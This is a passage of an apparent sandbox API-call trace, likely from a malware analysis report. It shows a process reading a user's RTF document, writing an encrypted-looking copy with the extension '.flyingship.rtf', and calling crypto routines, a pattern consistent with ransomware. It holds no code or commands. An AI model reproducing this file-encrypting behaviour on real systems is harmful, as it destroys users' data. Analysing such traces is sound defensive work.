(in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.726] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0178.726] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.726] CryptDestroyHash (hHash=0x90ae18) returned 1 [0178.726] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.726] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.726] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.726] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.727] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.728] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\1usrk9.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0178.728] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.728] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0178.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0178.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0178.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0178.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0178.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0178.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0178.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0178.728] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0178.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0178.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0178.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0178.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0178.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0178.729] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0178.729] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0178.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0178.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0178.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0178.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0178.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0178.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0178.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0178.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0178.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0178.729] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0178.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0178.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0178.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0178.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0178.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0178.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0178.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0178.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0178.729] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0178.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0178.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0178.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0178.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0178.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0178.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3478 [0178.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0178.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0178.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0178.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0178.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0178.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0178.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0178.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0178.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0178.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0178.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0178.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0178.730] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0178.730] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm")) returned 0x10 [0178.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0178.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.730] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0178.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0178.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0178.731] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0178.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0178.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0178.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0178.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0178.731] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.flyingship.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\1usrk9.flyingship.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0178.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0178.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0178.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0178.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0178.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0178.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0178.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0178.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0178.732] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0178.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0178.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0178.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0178.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0178.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0178.732] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.732] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0178.732] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0178.732] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0178.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0178.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0178.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0178.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0178.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0178.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.733] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0178.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0178.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0178.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0178.733] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0178.733] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xa052, lpOverlapped=0x0) returned 1 [0178.736] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0178.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0178.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0178.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.736] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa052) returned 0xbea018 [0178.736] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0178.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0178.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0178.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0178.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0178.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0178.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa052) returned 0xbf4078 [0178.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0178.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.737] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0178.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0178.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0178.737] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa052) returned 0xbea018 [0178.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.737] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0178.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0178.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0178.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.738] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0178.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0178.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0178.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0178.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0178.738] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0178.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0178.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0178.738] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0178.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0178.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0178.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0178.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0178.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0178.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0178.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa052) returned 0xbea018 [0178.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0178.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0178.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0178.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0178.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2688 [0178.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0178.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0178.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0178.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27c8 [0178.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0178.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0178.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0178.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba378 [0178.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0178.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0178.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0178.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0178.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0178.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa052) returned 0xbfe0d8 [0178.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0178.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0178.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0178.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0178.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0178.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0178.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0178.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0178.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0178.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0178.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0178.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0178.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0178.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0178.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0178.740] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0178.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0178.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0178.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0178.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0178.740] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0178.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0178.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0178.740] HeapFree (in: 